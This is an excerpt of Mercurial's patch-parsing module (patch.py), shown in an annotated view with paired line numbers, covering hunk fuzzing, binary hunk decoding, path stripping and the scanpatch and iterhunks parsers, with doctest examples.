1366 self.a.append(x)
1367 self.a.append(x)
1367 if not self.b:
1368 if not self.b:
1368 # this happens when lines were only deleted from the hunk
1369 # this happens when lines were only deleted from the hunk
1369 for x in self.hunk:
1370 for x in self.hunk:
1370 if x.startswith('+') or x.startswith(' '):
1371 if x.startswith('+') or x.startswith(' '):
1371 self.b.append(x[1:])
1372 self.b.append(x[1:])
1372 # @@ -start,len +start,len @@
1373 # @@ -start,len +start,len @@
1373 self.desc = "@@ -%d,%d +%d,%d @@\n" % (self.starta, self.lena,
1374 self.desc = "@@ -%d,%d +%d,%d @@\n" % (self.starta, self.lena,
1374 self.startb, self.lenb)
1375 self.startb, self.lenb)
1375 self.hunk[0] = self.desc
1376 self.hunk[0] = self.desc
1376 self._fixnewline(lr)
1377 self._fixnewline(lr)
1377
1378
1378 def _fixnewline(self, lr):
1379 def _fixnewline(self, lr):
1379 l = lr.readline()
1380 l = lr.readline()
1380 if l.startswith('\ '):
1381 if l.startswith('\ '):
1381 diffhelper.fixnewline(self.hunk, self.a, self.b)
1382 diffhelper.fixnewline(self.hunk, self.a, self.b)
1382 else:
1383 else:
1383 lr.push(l)
1384 lr.push(l)
1384
1385
1385 def complete(self):
1386 def complete(self):
1386 return len(self.a) == self.lena and len(self.b) == self.lenb
1387 return len(self.a) == self.lena and len(self.b) == self.lenb
1387
1388
1388 def _fuzzit(self, old, new, fuzz, toponly):
1389 def _fuzzit(self, old, new, fuzz, toponly):
1389 # this removes context lines from the top and bottom of list 'l'. It
1390 # this removes context lines from the top and bottom of list 'l'. It
1390 # checks the hunk to make sure only context lines are removed, and then
1391 # checks the hunk to make sure only context lines are removed, and then
1391 # returns a new shortened list of lines.
1392 # returns a new shortened list of lines.
1392 fuzz = min(fuzz, len(old))
1393 fuzz = min(fuzz, len(old))
1393 if fuzz:
1394 if fuzz:
1394 top = 0
1395 top = 0
1395 bot = 0
1396 bot = 0
1396 hlen = len(self.hunk)
1397 hlen = len(self.hunk)
1397 for x in xrange(hlen - 1):
1398 for x in xrange(hlen - 1):
1398 # the hunk starts with the @@ line, so use x+1
1399 # the hunk starts with the @@ line, so use x+1
1399 if self.hunk[x + 1].startswith(' '):
1400 if self.hunk[x + 1].startswith(' '):
1400 top += 1
1401 top += 1
1401 else:
1402 else:
1402 break
1403 break
1403 if not toponly:
1404 if not toponly:
1404 for x in xrange(hlen - 1):
1405 for x in xrange(hlen - 1):
1405 if self.hunk[hlen - bot - 1].startswith(' '):
1406 if self.hunk[hlen - bot - 1].startswith(' '):
1406 bot += 1
1407 bot += 1
1407 else:
1408 else:
1408 break
1409 break
1409
1410
1410 bot = min(fuzz, bot)
1411 bot = min(fuzz, bot)
1411 top = min(fuzz, top)
1412 top = min(fuzz, top)
1412 return old[top:len(old) - bot], new[top:len(new) - bot], top
1413 return old[top:len(old) - bot], new[top:len(new) - bot], top
1413 return old, new, 0
1414 return old, new, 0
1414
1415
1415 def fuzzit(self, fuzz, toponly):
1416 def fuzzit(self, fuzz, toponly):
1416 old, new, top = self._fuzzit(self.a, self.b, fuzz, toponly)
1417 old, new, top = self._fuzzit(self.a, self.b, fuzz, toponly)
1417 oldstart = self.starta + top
1418 oldstart = self.starta + top
1418 newstart = self.startb + top
1419 newstart = self.startb + top
1419 # zero length hunk ranges already have their start decremented
1420 # zero length hunk ranges already have their start decremented
1420 if self.lena and oldstart > 0:
1421 if self.lena and oldstart > 0:
1421 oldstart -= 1
1422 oldstart -= 1
1422 if self.lenb and newstart > 0:
1423 if self.lenb and newstart > 0:
1423 newstart -= 1
1424 newstart -= 1
1424 return old, oldstart, new, newstart
1425 return old, oldstart, new, newstart
1425
1426
1426 class binhunk(object):
1427 class binhunk(object):
1427 'A binary patch file.'
1428 'A binary patch file.'
1428 def __init__(self, lr, fname):
1429 def __init__(self, lr, fname):
1429 self.text = None
1430 self.text = None
1430 self.delta = False
1431 self.delta = False
1431 self.hunk = ['GIT binary patch\n']
1432 self.hunk = ['GIT binary patch\n']
1432 self._fname = fname
1433 self._fname = fname
1433 self._read(lr)
1434 self._read(lr)
1434
1435
1435 def complete(self):
1436 def complete(self):
1436 return self.text is not None
1437 return self.text is not None
1437
1438
1438 def new(self, lines):
1439 def new(self, lines):
1439 if self.delta:
1440 if self.delta:
1440 return [applybindelta(self.text, ''.join(lines))]
1441 return [applybindelta(self.text, ''.join(lines))]
1441 return [self.text]
1442 return [self.text]
1442
1443
1443 def _read(self, lr):
1444 def _read(self, lr):
1444 def getline(lr, hunk):
1445 def getline(lr, hunk):
1445 l = lr.readline()
1446 l = lr.readline()
1446 hunk.append(l)
1447 hunk.append(l)
1447 return l.rstrip('\r\n')
1448 return l.rstrip('\r\n')
1448
1449
1449 size = 0
1450 size = 0
1450 while True:
1451 while True:
1451 line = getline(lr, self.hunk)
1452 line = getline(lr, self.hunk)
1452 if not line:
1453 if not line:
1453 raise PatchError(_('could not extract "%s" binary data')
1454 raise PatchError(_('could not extract "%s" binary data')
1454 % self._fname)
1455 % self._fname)
1455 if line.startswith('literal '):
1456 if line.startswith('literal '):
1456 size = int(line[8:].rstrip())
1457 size = int(line[8:].rstrip())
1457 break
1458 break
1458 if line.startswith('delta '):
1459 if line.startswith('delta '):
1459 size = int(line[6:].rstrip())
1460 size = int(line[6:].rstrip())
1460 self.delta = True
1461 self.delta = True
1461 break
1462 break
1462 dec = []
1463 dec = []
1463 line = getline(lr, self.hunk)
1464 line = getline(lr, self.hunk)
1464 while len(line) > 1:
1465 while len(line) > 1:
1465 l = line[0:1]
1466 l = line[0:1]
1466 if l <= 'Z' and l >= 'A':
1467 if l <= 'Z' and l >= 'A':
1467 l = ord(l) - ord('A') + 1
1468 l = ord(l) - ord('A') + 1
1468 else:
1469 else:
1469 l = ord(l) - ord('a') + 27
1470 l = ord(l) - ord('a') + 27
1470 try:
1471 try:
1471 dec.append(util.b85decode(line[1:])[:l])
1472 dec.append(util.b85decode(line[1:])[:l])
1472 except ValueError as e:
1473 except ValueError as e:
1473 raise PatchError(_('could not decode "%s" binary patch: %s')
1474 raise PatchError(_('could not decode "%s" binary patch: %s')
1474 % (self._fname, stringutil.forcebytestr(e)))
1475 % (self._fname, stringutil.forcebytestr(e)))
1475 line = getline(lr, self.hunk)
1476 line = getline(lr, self.hunk)
1476 text = zlib.decompress(''.join(dec))
1477 text = zlib.decompress(''.join(dec))
1477 if len(text) != size:
1478 if len(text) != size:
1478 raise PatchError(_('"%s" length is %d bytes, should be %d')
1479 raise PatchError(_('"%s" length is %d bytes, should be %d')
1479 % (self._fname, len(text), size))
1480 % (self._fname, len(text), size))
1480 self.text = text
1481 self.text = text
1481
1482
1482 def parsefilename(str):
1483 def parsefilename(str):
1483 # --- filename \t|space stuff
1484 # --- filename \t|space stuff
1484 s = str[4:].rstrip('\r\n')
1485 s = str[4:].rstrip('\r\n')
1485 i = s.find('\t')
1486 i = s.find('\t')
1486 if i < 0:
1487 if i < 0:
1487 i = s.find(' ')
1488 i = s.find(' ')
1488 if i < 0:
1489 if i < 0:
1489 return s
1490 return s
1490 return s[:i]
1491 return s[:i]
1491
1492
1492 def reversehunks(hunks):
1493 def reversehunks(hunks):
1493 '''reverse the signs in the hunks given as argument
1494 '''reverse the signs in the hunks given as argument
1494
1495
1495 This function operates on hunks coming out of patch.filterpatch, that is
1496 This function operates on hunks coming out of patch.filterpatch, that is
1496 a list of the form: [header1, hunk1, hunk2, header2...]. Example usage:
1497 a list of the form: [header1, hunk1, hunk2, header2...]. Example usage:
1497
1498
1498 >>> rawpatch = b"""diff --git a/folder1/g b/folder1/g
1499 >>> rawpatch = b"""diff --git a/folder1/g b/folder1/g
1499 ... --- a/folder1/g
1500 ... --- a/folder1/g
1500 ... +++ b/folder1/g
1501 ... +++ b/folder1/g
1501 ... @@ -1,7 +1,7 @@
1502 ... @@ -1,7 +1,7 @@
1502 ... +firstline
1503 ... +firstline
1503 ... c
1504 ... c
1504 ... 1
1505 ... 1
1505 ... 2
1506 ... 2
1506 ... + 3
1507 ... + 3
1507 ... -4
1508 ... -4
1508 ... 5
1509 ... 5
1509 ... d
1510 ... d
1510 ... +lastline"""
1511 ... +lastline"""
1511 >>> hunks = parsepatch([rawpatch])
1512 >>> hunks = parsepatch([rawpatch])
1512 >>> hunkscomingfromfilterpatch = []
1513 >>> hunkscomingfromfilterpatch = []
1513 >>> for h in hunks:
1514 >>> for h in hunks:
1514 ... hunkscomingfromfilterpatch.append(h)
1515 ... hunkscomingfromfilterpatch.append(h)
1515 ... hunkscomingfromfilterpatch.extend(h.hunks)
1516 ... hunkscomingfromfilterpatch.extend(h.hunks)
1516
1517
1517 >>> reversedhunks = reversehunks(hunkscomingfromfilterpatch)
1518 >>> reversedhunks = reversehunks(hunkscomingfromfilterpatch)
1518 >>> from . import util
1519 >>> from . import util
1519 >>> fp = util.stringio()
1520 >>> fp = util.stringio()
1520 >>> for c in reversedhunks:
1521 >>> for c in reversedhunks:
1521 ... c.write(fp)
1522 ... c.write(fp)
1522 >>> fp.seek(0) or None
1523 >>> fp.seek(0) or None
1523 >>> reversedpatch = fp.read()
1524 >>> reversedpatch = fp.read()
1524 >>> print(pycompat.sysstr(reversedpatch))
1525 >>> print(pycompat.sysstr(reversedpatch))
1525 diff --git a/folder1/g b/folder1/g
1526 diff --git a/folder1/g b/folder1/g
1526 --- a/folder1/g
1527 --- a/folder1/g
1527 +++ b/folder1/g
1528 +++ b/folder1/g
1528 @@ -1,4 +1,3 @@
1529 @@ -1,4 +1,3 @@
1529 -firstline
1530 -firstline
1530 c
1531 c
1531 1
1532 1
1532 2
1533 2
1533 @@ -2,6 +1,6 @@
1534 @@ -2,6 +1,6 @@
1534 c
1535 c
1535 1
1536 1
1536 2
1537 2
1537 - 3
1538 - 3
1538 +4
1539 +4
1539 5
1540 5
1540 d
1541 d
1541 @@ -6,3 +5,2 @@
1542 @@ -6,3 +5,2 @@
1542 5
1543 5
1543 d
1544 d
1544 -lastline
1545 -lastline
1545
1546
1546 '''
1547 '''
1547
1548
1548 newhunks = []
1549 newhunks = []
1549 for c in hunks:
1550 for c in hunks:
1550 if util.safehasattr(c, 'reversehunk'):
1551 if util.safehasattr(c, 'reversehunk'):
1551 c = c.reversehunk()
1552 c = c.reversehunk()
1552 newhunks.append(c)
1553 newhunks.append(c)
1553 return newhunks
1554 return newhunks
1554
1555
1555 def parsepatch(originalchunks, maxcontext=None):
1556 def parsepatch(originalchunks, maxcontext=None):
1556 """patch -> [] of headers -> [] of hunks
1557 """patch -> [] of headers -> [] of hunks
1557
1558
1558 If maxcontext is not None, trim context lines if necessary.
1559 If maxcontext is not None, trim context lines if necessary.
1559
1560
1560 >>> rawpatch = b'''diff --git a/folder1/g b/folder1/g
1561 >>> rawpatch = b'''diff --git a/folder1/g b/folder1/g
1561 ... --- a/folder1/g
1562 ... --- a/folder1/g
1562 ... +++ b/folder1/g
1563 ... +++ b/folder1/g
1563 ... @@ -1,8 +1,10 @@
1564 ... @@ -1,8 +1,10 @@
1564 ... 1
1565 ... 1
1565 ... 2
1566 ... 2
1566 ... -3
1567 ... -3
1567 ... 4
1568 ... 4
1568 ... 5
1569 ... 5
1569 ... 6
1570 ... 6
1570 ... +6.1
1571 ... +6.1
1571 ... +6.2
1572 ... +6.2
1572 ... 7
1573 ... 7
1573 ... 8
1574 ... 8
1574 ... +9'''
1575 ... +9'''
1575 >>> out = util.stringio()
1576 >>> out = util.stringio()
1576 >>> headers = parsepatch([rawpatch], maxcontext=1)
1577 >>> headers = parsepatch([rawpatch], maxcontext=1)
1577 >>> for header in headers:
1578 >>> for header in headers:
1578 ... header.write(out)
1579 ... header.write(out)
1579 ... for hunk in header.hunks:
1580 ... for hunk in header.hunks:
1580 ... hunk.write(out)
1581 ... hunk.write(out)
1581 >>> print(pycompat.sysstr(out.getvalue()))
1582 >>> print(pycompat.sysstr(out.getvalue()))
1582 diff --git a/folder1/g b/folder1/g
1583 diff --git a/folder1/g b/folder1/g
1583 --- a/folder1/g
1584 --- a/folder1/g
1584 +++ b/folder1/g
1585 +++ b/folder1/g
1585 @@ -2,3 +2,2 @@
1586 @@ -2,3 +2,2 @@
1586 2
1587 2
1587 -3
1588 -3
1588 4
1589 4
1589 @@ -6,2 +5,4 @@
1590 @@ -6,2 +5,4 @@
1590 6
1591 6
1591 +6.1
1592 +6.1
1592 +6.2
1593 +6.2
1593 7
1594 7
1594 @@ -8,1 +9,2 @@
1595 @@ -8,1 +9,2 @@
1595 8
1596 8
1596 +9
1597 +9
1597 """
1598 """
1598 class parser(object):
1599 class parser(object):
1599 """patch parsing state machine"""
1600 """patch parsing state machine"""
1600 def __init__(self):
1601 def __init__(self):
1601 self.fromline = 0
1602 self.fromline = 0
1602 self.toline = 0
1603 self.toline = 0
1603 self.proc = ''
1604 self.proc = ''
1604 self.header = None
1605 self.header = None
1605 self.context = []
1606 self.context = []
1606 self.before = []
1607 self.before = []
1607 self.hunk = []
1608 self.hunk = []
1608 self.headers = []
1609 self.headers = []
1609
1610
1610 def addrange(self, limits):
1611 def addrange(self, limits):
1611 fromstart, fromend, tostart, toend, proc = limits
1612 fromstart, fromend, tostart, toend, proc = limits
1612 self.fromline = int(fromstart)
1613 self.fromline = int(fromstart)
1613 self.toline = int(tostart)
1614 self.toline = int(tostart)
1614 self.proc = proc
1615 self.proc = proc
1615
1616
1616 def addcontext(self, context):
1617 def addcontext(self, context):
1617 if self.hunk:
1618 if self.hunk:
1618 h = recordhunk(self.header, self.fromline, self.toline,
1619 h = recordhunk(self.header, self.fromline, self.toline,
1619 self.proc, self.before, self.hunk, context, maxcontext)
1620 self.proc, self.before, self.hunk, context, maxcontext)
1620 self.header.hunks.append(h)
1621 self.header.hunks.append(h)
1621 self.fromline += len(self.before) + h.removed
1622 self.fromline += len(self.before) + h.removed
1622 self.toline += len(self.before) + h.added
1623 self.toline += len(self.before) + h.added
1623 self.before = []
1624 self.before = []
1624 self.hunk = []
1625 self.hunk = []
1625 self.context = context
1626 self.context = context
1626
1627
1627 def addhunk(self, hunk):
1628 def addhunk(self, hunk):
1628 if self.context:
1629 if self.context:
1629 self.before = self.context
1630 self.before = self.context
1630 self.context = []
1631 self.context = []
1631 self.hunk = hunk
1632 self.hunk = hunk
1632
1633
1633 def newfile(self, hdr):
1634 def newfile(self, hdr):
1634 self.addcontext([])
1635 self.addcontext([])
1635 h = header(hdr)
1636 h = header(hdr)
1636 self.headers.append(h)
1637 self.headers.append(h)
1637 self.header = h
1638 self.header = h
1638
1639
1639 def addother(self, line):
1640 def addother(self, line):
1640 pass # 'other' lines are ignored
1641 pass # 'other' lines are ignored
1641
1642
1642 def finished(self):
1643 def finished(self):
1643 self.addcontext([])
1644 self.addcontext([])
1644 return self.headers
1645 return self.headers
1645
1646
1646 transitions = {
1647 transitions = {
1647 'file': {'context': addcontext,
1648 'file': {'context': addcontext,
1648 'file': newfile,
1649 'file': newfile,
1649 'hunk': addhunk,
1650 'hunk': addhunk,
1650 'range': addrange},
1651 'range': addrange},
1651 'context': {'file': newfile,
1652 'context': {'file': newfile,
1652 'hunk': addhunk,
1653 'hunk': addhunk,
1653 'range': addrange,
1654 'range': addrange,
1654 'other': addother},
1655 'other': addother},
1655 'hunk': {'context': addcontext,
1656 'hunk': {'context': addcontext,
1656 'file': newfile,
1657 'file': newfile,
1657 'range': addrange},
1658 'range': addrange},
1658 'range': {'context': addcontext,
1659 'range': {'context': addcontext,
1659 'hunk': addhunk},
1660 'hunk': addhunk},
1660 'other': {'other': addother},
1661 'other': {'other': addother},
1661 }
1662 }
1662
1663
1663 p = parser()
1664 p = parser()
1664 fp = stringio()
1665 fp = stringio()
1665 fp.write(''.join(originalchunks))
1666 fp.write(''.join(originalchunks))
1666 fp.seek(0)
1667 fp.seek(0)
1667
1668
1668 state = 'context'
1669 state = 'context'
1669 for newstate, data in scanpatch(fp):
1670 for newstate, data in scanpatch(fp):
1670 try:
1671 try:
1671 p.transitions[state][newstate](p, data)
1672 p.transitions[state][newstate](p, data)
1672 except KeyError:
1673 except KeyError:
1673 raise PatchError('unhandled transition: %s -> %s' %
1674 raise PatchError('unhandled transition: %s -> %s' %
1674 (state, newstate))
1675 (state, newstate))
1675 state = newstate
1676 state = newstate
1676 del fp
1677 del fp
1677 return p.finished()
1678 return p.finished()
1678
1679
1679 def pathtransform(path, strip, prefix):
1680 def pathtransform(path, strip, prefix):
1680 '''turn a path from a patch into a path suitable for the repository
1681 '''turn a path from a patch into a path suitable for the repository
1681
1682
1682 prefix, if not empty, is expected to be normalized with a / at the end.
1683 prefix, if not empty, is expected to be normalized with a / at the end.
1683
1684
1684 Returns (stripped components, path in repository).
1685 Returns (stripped components, path in repository).
1685
1686
1686 >>> pathtransform(b'a/b/c', 0, b'')
1687 >>> pathtransform(b'a/b/c', 0, b'')
1687 ('', 'a/b/c')
1688 ('', 'a/b/c')
1688 >>> pathtransform(b' a/b/c ', 0, b'')
1689 >>> pathtransform(b' a/b/c ', 0, b'')
1689 ('', ' a/b/c')
1690 ('', ' a/b/c')
1690 >>> pathtransform(b' a/b/c ', 2, b'')
1691 >>> pathtransform(b' a/b/c ', 2, b'')
1691 ('a/b/', 'c')
1692 ('a/b/', 'c')
1692 >>> pathtransform(b'a/b/c', 0, b'd/e/')
1693 >>> pathtransform(b'a/b/c', 0, b'd/e/')
1693 ('', 'd/e/a/b/c')
1694 ('', 'd/e/a/b/c')
1694 >>> pathtransform(b' a//b/c ', 2, b'd/e/')
1695 >>> pathtransform(b' a//b/c ', 2, b'd/e/')
1695 ('a//b/', 'd/e/c')
1696 ('a//b/', 'd/e/c')
1696 >>> pathtransform(b'a/b/c', 3, b'')
1697 >>> pathtransform(b'a/b/c', 3, b'')
1697 Traceback (most recent call last):
1698 Traceback (most recent call last):
1698 PatchError: unable to strip away 1 of 3 dirs from a/b/c
1699 PatchError: unable to strip away 1 of 3 dirs from a/b/c
1699 '''
1700 '''
1700 pathlen = len(path)
1701 pathlen = len(path)
1701 i = 0
1702 i = 0
1702 if strip == 0:
1703 if strip == 0:
1703 return '', prefix + path.rstrip()
1704 return '', prefix + path.rstrip()
1704 count = strip
1705 count = strip
1705 while count > 0:
1706 while count > 0:
1706 i = path.find('/', i)
1707 i = path.find('/', i)
1707 if i == -1:
1708 if i == -1:
1708 raise PatchError(_("unable to strip away %d of %d dirs from %s") %
1709 raise PatchError(_("unable to strip away %d of %d dirs from %s") %
1709 (count, strip, path))
1710 (count, strip, path))
1710 i += 1
1711 i += 1
1711 # consume '//' in the path
1712 # consume '//' in the path
1712 while i < pathlen - 1 and path[i:i + 1] == '/':
1713 while i < pathlen - 1 and path[i:i + 1] == '/':
1713 i += 1
1714 i += 1
1714 count -= 1
1715 count -= 1
1715 return path[:i].lstrip(), prefix + path[i:].rstrip()
1716 return path[:i].lstrip(), prefix + path[i:].rstrip()
1716
1717
1717 def makepatchmeta(backend, afile_orig, bfile_orig, hunk, strip, prefix):
1718 def makepatchmeta(backend, afile_orig, bfile_orig, hunk, strip, prefix):
1718 nulla = afile_orig == "/dev/null"
1719 nulla = afile_orig == "/dev/null"
1719 nullb = bfile_orig == "/dev/null"
1720 nullb = bfile_orig == "/dev/null"
1720 create = nulla and hunk.starta == 0 and hunk.lena == 0
1721 create = nulla and hunk.starta == 0 and hunk.lena == 0
1721 remove = nullb and hunk.startb == 0 and hunk.lenb == 0
1722 remove = nullb and hunk.startb == 0 and hunk.lenb == 0
1722 abase, afile = pathtransform(afile_orig, strip, prefix)
1723 abase, afile = pathtransform(afile_orig, strip, prefix)
1723 gooda = not nulla and backend.exists(afile)
1724 gooda = not nulla and backend.exists(afile)
1724 bbase, bfile = pathtransform(bfile_orig, strip, prefix)
1725 bbase, bfile = pathtransform(bfile_orig, strip, prefix)
1725 if afile == bfile:
1726 if afile == bfile:
1726 goodb = gooda
1727 goodb = gooda
1727 else:
1728 else:
1728 goodb = not nullb and backend.exists(bfile)
1729 goodb = not nullb and backend.exists(bfile)
1729 missing = not goodb and not gooda and not create
1730 missing = not goodb and not gooda and not create
1730
1731
1731 # some diff programs apparently produce patches where the afile is
1732 # some diff programs apparently produce patches where the afile is
1732 # not /dev/null, but afile starts with bfile
1733 # not /dev/null, but afile starts with bfile
1733 abasedir = afile[:afile.rfind('/') + 1]
1734 abasedir = afile[:afile.rfind('/') + 1]
1734 bbasedir = bfile[:bfile.rfind('/') + 1]
1735 bbasedir = bfile[:bfile.rfind('/') + 1]
1735 if (missing and abasedir == bbasedir and afile.startswith(bfile)
1736 if (missing and abasedir == bbasedir and afile.startswith(bfile)
1736 and hunk.starta == 0 and hunk.lena == 0):
1737 and hunk.starta == 0 and hunk.lena == 0):
1737 create = True
1738 create = True
1738 missing = False
1739 missing = False
1739
1740
1740 # If afile is "a/b/foo" and bfile is "a/b/foo.orig" we assume the
1741 # If afile is "a/b/foo" and bfile is "a/b/foo.orig" we assume the
1741 # diff is between a file and its backup. In this case, the original
1742 # diff is between a file and its backup. In this case, the original
1742 # file should be patched (see original mpatch code).
1743 # file should be patched (see original mpatch code).
1743 isbackup = (abase == bbase and bfile.startswith(afile))
1744 isbackup = (abase == bbase and bfile.startswith(afile))
1744 fname = None
1745 fname = None
1745 if not missing:
1746 if not missing:
1746 if gooda and goodb:
1747 if gooda and goodb:
1747 if isbackup:
1748 if isbackup:
1748 fname = afile
1749 fname = afile
1749 else:
1750 else:
1750 fname = bfile
1751 fname = bfile
1751 elif gooda:
1752 elif gooda:
1752 fname = afile
1753 fname = afile
1753
1754
1754 if not fname:
1755 if not fname:
1755 if not nullb:
1756 if not nullb:
1756 if isbackup:
1757 if isbackup:
1757 fname = afile
1758 fname = afile
1758 else:
1759 else:
1759 fname = bfile
1760 fname = bfile
1760 elif not nulla:
1761 elif not nulla:
1761 fname = afile
1762 fname = afile
1762 else:
1763 else:
1763 raise PatchError(_("undefined source and destination files"))
1764 raise PatchError(_("undefined source and destination files"))
1764
1765
1765 gp = patchmeta(fname)
1766 gp = patchmeta(fname)
1766 if create:
1767 if create:
1767 gp.op = 'ADD'
1768 gp.op = 'ADD'
1768 elif remove:
1769 elif remove:
1769 gp.op = 'DELETE'
1770 gp.op = 'DELETE'
1770 return gp
1771 return gp
1771
1772
1772 def scanpatch(fp):
1773 def scanpatch(fp):
1773 """like patch.iterhunks, but yield different events
1774 """like patch.iterhunks, but yield different events
1774
1775
1775 - ('file', [header_lines + fromfile + tofile])
1776 - ('file', [header_lines + fromfile + tofile])
1776 - ('context', [context_lines])
1777 - ('context', [context_lines])
1777 - ('hunk', [hunk_lines])
1778 - ('hunk', [hunk_lines])
1778 - ('range', (-start,len, +start,len, proc))
1779 - ('range', (-start,len, +start,len, proc))
1779 """
1780 """
1780 lines_re = re.compile(br'@@ -(\d+),(\d+) \+(\d+),(\d+) @@\s*(.*)')
1781 lines_re = re.compile(br'@@ -(\d+),(\d+) \+(\d+),(\d+) @@\s*(.*)')
1781 lr = linereader(fp)
1782 lr = linereader(fp)
1782
1783
1783 def scanwhile(first, p):
1784 def scanwhile(first, p):
1784 """scan lr while predicate holds"""
1785 """scan lr while predicate holds"""
1785 lines = [first]
1786 lines = [first]
1786 for line in iter(lr.readline, ''):
1787 for line in iter(lr.readline, ''):
1787 if p(line):
1788 if p(line):
1788 lines.append(line)
1789 lines.append(line)
1789 else:
1790 else:
1790 lr.push(line)
1791 lr.push(line)
1791 break
1792 break
1792 return lines
1793 return lines
1793
1794
1794 for line in iter(lr.readline, ''):
1795 for line in iter(lr.readline, ''):
1795 if line.startswith('diff --git a/') or line.startswith('diff -r '):
1796 if line.startswith('diff --git a/') or line.startswith('diff -r '):
1796 def notheader(line):
1797 def notheader(line):
1797 s = line.split(None, 1)
1798 s = line.split(None, 1)
1798 return not s or s[0] not in ('---', 'diff')
1799 return not s or s[0] not in ('---', 'diff')
1799 header = scanwhile(line, notheader)
1800 header = scanwhile(line, notheader)
1800 fromfile = lr.readline()
1801 fromfile = lr.readline()
1801 if fromfile.startswith('---'):
1802 if fromfile.startswith('---'):
1802 tofile = lr.readline()
1803 tofile = lr.readline()
1803 header += [fromfile, tofile]
1804 header += [fromfile, tofile]
1804 else:
1805 else:
1805 lr.push(fromfile)
1806 lr.push(fromfile)
1806 yield 'file', header
1807 yield 'file', header
1807 elif line.startswith(' '):
1808 elif line.startswith(' '):
1808 cs = (' ', '\\')
1809 cs = (' ', '\\')
1809 yield 'context', scanwhile(line, lambda l: l.startswith(cs))
1810 yield 'context', scanwhile(line, lambda l: l.startswith(cs))
1810 elif line.startswith(('-', '+')):
1811 elif line.startswith(('-', '+')):
1811 cs = ('-', '+', '\\')
1812 cs = ('-', '+', '\\')
1812 yield 'hunk', scanwhile(line, lambda l: l.startswith(cs))
1813 yield 'hunk', scanwhile(line, lambda l: l.startswith(cs))
1813 else:
1814 else:
1814 m = lines_re.match(line)
1815 m = lines_re.match(line)
1815 if m:
1816 if m:
1816 yield 'range', m.groups()
1817 yield 'range', m.groups()
1817 else:
1818 else:
1818 yield 'other', line
1819 yield 'other', line
1819
1820
1820 def scangitpatch(lr, firstline):
1821 def scangitpatch(lr, firstline):
1821 """
1822 """
1822 Git patches can emit:
1823 Git patches can emit:
1823 - rename a to b
1824 - rename a to b
1824 - change b
1825 - change b
1825 - copy a to c
1826 - copy a to c
1826 - change c
1827 - change c
1827
1828
1828 We cannot apply this sequence as-is, the renamed 'a' could not be
1829 We cannot apply this sequence as-is, the renamed 'a' could not be
1829 found for it would have been renamed already. And we cannot copy
1830 found for it would have been renamed already. And we cannot copy
1830 from 'b' instead because 'b' would have been changed already. So
1831 from 'b' instead because 'b' would have been changed already. So
1831 we scan the git patch for copy and rename commands so we can
1832 we scan the git patch for copy and rename commands so we can
1832 perform the copies ahead of time.
1833 perform the copies ahead of time.
1833 """
1834 """
1834 pos = 0
1835 pos = 0
1835 try:
1836 try:
1836 pos = lr.fp.tell()
1837 pos = lr.fp.tell()
1837 fp = lr.fp
1838 fp = lr.fp
1838 except IOError:
1839 except IOError:
1839 fp = stringio(lr.fp.read())
1840 fp = stringio(lr.fp.read())
1840 gitlr = linereader(fp)
1841 gitlr = linereader(fp)
1841 gitlr.push(firstline)
1842 gitlr.push(firstline)
1842 gitpatches = readgitpatch(gitlr)
1843 gitpatches = readgitpatch(gitlr)
1843 fp.seek(pos)
1844 fp.seek(pos)
1844 return gitpatches
1845 return gitpatches
1845
1846
1846 def iterhunks(fp):
1847 def iterhunks(fp):
1847 """Read a patch and yield the following events:
1848 """Read a patch and yield the following events:
1848 - ("file", afile, bfile, firsthunk): select a new target file.
1849 - ("file", afile, bfile, firsthunk): select a new target file.
1849 - ("hunk", hunk): a new hunk is ready to be applied, follows a
1850 - ("hunk", hunk): a new hunk is ready to be applied, follows a
1850 "file" event.
1851 "file" event.
1851 - ("git", gitchanges): current diff is in git format, gitchanges
1852 - ("git", gitchanges): current diff is in git format, gitchanges
1852 maps filenames to gitpatch records. Unique event.
1853 maps filenames to gitpatch records. Unique event.
1853 """
1854 """
1854 afile = ""
1855 afile = ""
1855 bfile = ""
1856 bfile = ""
1856 state = None
1857 state = None
1857 hunknum = 0
1858 hunknum = 0
1858 emitfile = newfile = False
1859 emitfile = newfile = False
1859 gitpatches = None
1860 gitpatches = None
1860
1861
1861 # our states
1862 # our states
1862 BFILE = 1
1863 BFILE = 1
1863 context = None
1864 context = None
1864 lr = linereader(fp)
1865 lr = linereader(fp)
1865
1866
1866 for x in iter(lr.readline, ''):
1867 for x in iter(lr.readline, ''):
1867 if state == BFILE and (
1868 if state == BFILE and (
1868 (not context and x.startswith('@'))
1869 (not context and x.startswith('@'))
1869 or (context is not False and x.startswith('***************'))
1870 or (context is not False and x.startswith('***************'))
1870 or x.startswith('GIT binary patch')):
1871 or x.startswith('GIT binary patch')):
1871 gp = None
1872 gp = None
1872 if (gitpatches and
1873 if (gitpatches and
1873 gitpatches[-1].ispatching(afile, bfile)):
1874 gitpatches[-1].ispatching(afile, bfile)):
1874 gp = gitpatches.pop()
1875 gp = gitpatches.pop()
1875 if x.startswith('GIT binary patch'):
1876 if x.startswith('GIT binary patch'):
1876 h = binhunk(lr, gp.path)
1877 h = binhunk(lr, gp.path)
1877 else:
1878 else:
1878 if context is None and x.startswith('***************'):
1879 if context is None and x.startswith('***************'):
1879 context = True
1880 context = True
1880 h = hunk(x, hunknum + 1, lr, context)
1881 h = hunk(x, hunknum + 1, lr, context)
1881 hunknum += 1
1882 hunknum += 1
1882 if emitfile:
1883 if emitfile:
1883 emitfile = False
1884 emitfile = False
1884 yield 'file', (afile, bfile, h, gp and gp.copy() or None)
1885 yield 'file', (afile, bfile, h, gp and gp.copy() or None)
1885 yield 'hunk', h
1886 yield 'hunk', h
1886 elif x.startswith('diff --git a/'):
1887 elif x.startswith('diff --git a/'):
1887 m = gitre.match(x.rstrip(' \r\n'))
1888 m = gitre.match(x.rstrip(' \r\n'))
1888 if not m:
1889 if not m:
1889 continue
1890 continue
1890 if gitpatches is None:
1891 if gitpatches is None:
1891 # scan whole input for git metadata
1892 # scan whole input for git metadata
1892 gitpatches = scangitpatch(lr, x)
1893 gitpatches = scangitpatch(lr, x)
1893 yield 'git', [g.copy() for g in gitpatches
1894 yield 'git', [g.copy() for g in gitpatches
1894 if g.op in ('COPY', 'RENAME')]
1895 if g.op in ('COPY', 'RENAME')]
1895 gitpatches.reverse()
1896 gitpatches.reverse()
1896 afile = 'a/' + m.group(1)
1897 afile = 'a/' + m.group(1)
1897 bfile = 'b/' + m.group(2)
1898 bfile = 'b/' + m.group(2)
1898 while gitpatches and not gitpatches[-1].ispatching(afile, bfile):
1899 while gitpatches and not gitpatches[-1].ispatching(afile, bfile):
1899 gp = gitpatches.pop()
1900 gp = gitpatches.pop()
